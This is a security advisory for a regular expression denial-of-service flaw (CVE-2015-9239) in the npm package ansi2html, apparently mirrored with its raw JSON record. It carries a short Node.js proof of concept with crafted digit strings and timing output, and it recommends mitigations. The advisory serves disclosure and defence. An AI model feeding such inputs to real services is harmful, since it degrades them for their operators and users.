ghsa-c2v2-7rcg-2ch7
Vulnerability from github
Published
2020-09-01 15:17
Modified
2021-01-14 15:58
Summary
Regular Expression Denial of Service in ansi2html
Details

The ansi2html package is affected by a regular expression denial of service vulnerability when certain types of user input is passed in.

Proof of concept

``` var ansi2html = require('ansi2html')

var start = process.hrtime(); ansi2html("[1111111111111111111111;0000000000000000000000"); console.log(process.hrtime(start));

start = process.hrtime(); ansi2html("[1111111111111111111111;00000000000000000000000"); console.log(process.hrtime(start));

start = process.hrtime(); ansi2html("[1111111111111111111111;000000000000000000000000"); console.log(process.hrtime(start));

start = process.hrtime(); ansi2html("[1111111111111111111111;0000000000000000000000000000"); console.log(process.hrtime(start)); ```

Results of the above 00:29:53-adam_baldwin~/tmp$ node test [ 0, 119615367 ] [ 0, 149934565 ] [ 0, 233325677 ] [ 3, 46582479 ]

Recommendation

At the time of this writing, February 2018, all versions of ansi2html remain vulnerable, and the package has not been updated for 4 years.

In order to use this package safely, it is necessary to avoid passing user input to the package, or to limit the size of the input string to a size with a parse time you find acceptable. Unfortunately, the match time grows at quite a small character count, so it is unlikely for it to both allow strings of a useful size while protecting against the denial of service attack.

In the case that user input of significant length must be parsed by ansi2html, the best mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.]available on npm

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "ansi2html"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2015-9239"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:09:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "The `ansi2html` package is affected by a regular expression denial of service vulnerability when certain types of user input is passed in.\n\n\n## Proof of concept\n```\nvar ansi2html = require(\u0027ansi2html\u0027)\n\nvar start = process.hrtime();\nansi2html(\"[1111111111111111111111;0000000000000000000000\");\nconsole.log(process.hrtime(start));\n\nstart = process.hrtime();\nansi2html(\"[1111111111111111111111;00000000000000000000000\");\nconsole.log(process.hrtime(start));\n\nstart = process.hrtime();\nansi2html(\"[1111111111111111111111;000000000000000000000000\");\nconsole.log(process.hrtime(start));\n\nstart = process.hrtime();\nansi2html(\"[1111111111111111111111;0000000000000000000000000000\");\nconsole.log(process.hrtime(start));\n```\n\nResults of the above\n```\n00:29:53-adam_baldwin~/tmp$ node test\n[ 0, 119615367 ]\n[ 0, 149934565 ]\n[ 0, 233325677 ]\n[ 3, 46582479 ]\n```\n\n\n## Recommendation\n\nAt the time of this writing, February 2018, all versions of `ansi2html` remain vulnerable, and the package has not been updated for 4 years. \n\nIn order to use this package safely, it is necessary to avoid passing user input to the package, or to limit the size of the input string to a size with a parse time you find acceptable. Unfortunately, the match time grows at quite a small character count, so it is unlikely for it to both allow strings of a useful size while protecting against the denial of service attack. \n\nIn the case that user input of significant length must be parsed by ansi2html, the best mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.][available on npm](https://www.npmjs.com/search?q=ansi+html)",
  "id": "GHSA-c2v2-7rcg-2ch7",
  "modified": "2021-01-14T15:58:08Z",
  "published": "2020-09-01T15:17:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-9239"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/51"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Regular Expression Denial of Service in ansi2html"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.